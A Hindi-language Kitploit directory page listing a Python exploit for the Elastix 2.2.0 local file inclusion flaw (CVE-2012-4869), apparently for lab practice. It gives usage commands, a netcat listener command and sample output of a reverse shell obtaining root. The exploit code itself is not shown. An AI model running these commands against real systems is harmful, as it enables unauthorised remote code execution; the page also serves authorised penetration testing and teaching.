Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Elastix-2.2.0-CVE-2012-4869 — Python exploit स्क्रिप्ट Elastix 2.2.0 LFI भेद्यता (CVE-2012-4869) के लिए, जो Perl रिवर्स शेल पेलोड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन सक्षम करती है। | Kitploit
उपकरण/GitHubGitHub/cyberdesu/elastix-2.2.0-cve-2012-4869
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcyberdesu/elastix-2.2.0-cve-2012-4869

Elastix-2.2.0-CVE-2012-4869

Python exploit स्क्रिप्ट Elastix 2.2.0 LFI भेद्यता (CVE-2012-4869) के लिए, जो Perl रिवर्स शेल पेलोड इंजेक्शन के माध्यम से रिमोट कोड निष्पादन सक्षम करती है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Elastix 2.2.0 लोकल फ़ाइल इन्क्लूज़न एक्सप्लॉइट - CVE-2012-4869

विवरण

यह स्क्रिप्ट Elastix 2.2.0 में एक लोकल फ़ाइल इन्क्लूज़न (LFI) भेद्यता का शोषण करती है, जो callme_page.php एंडपॉइंट के माध्यम से कमांड इंजेक्ट करके रिमोट कोड निष्पादन (RCE) की अनुमति देती है। यह एक्सप्लॉइट CVE-2012-4869 पर आधारित है।

विशेषताएँ

  • टीएलएस प्रमाणपत्र सत्यापन को बायपास करता है।
  • पर्ल रिवर्स शेल पेलोड का उपयोग करता है।
  • रिवर्स शेल के लिए कस्टम LHOST और LPORT समर्थन करता है।
  • HTTPS सुरक्षा चेतावनियों को दबाता है।

आवश्यकताएँ

  • Python 3
  • requests मॉड्यूल

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>

उदाहरण:

root@kitploit:~
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001

रिवर्स शेल लिसनर सेटअप करें

एक्सप्लॉइट चलाने से पहले, अपनी मशीन पर Netcat लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 9001

एक्सप्लॉइट निष्पादन आउटपुट

root@kitploit:~
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001

[+] Exploit sent successfully, waiting for reverse shell...

[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)

नोट्स

  • यदि रिवर्स शेल कनेक्ट नहीं होता है, तो सुनिश्चित करें कि फ़ायरवॉल नियम और SELinux सेटिंग्स आउटबाउंड कनेक्शन की अनुमति देते हैं।
  • यदि पर्ल उपलब्ध नहीं है तो वैकल्पिक पेलोड (जैसे, Bash या Python) का उपयोग किया जा सकता है।
  • सुनिश्चित करें कि आपका LHOST लक्ष्य मशीन से पहुंच योग्य है।

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें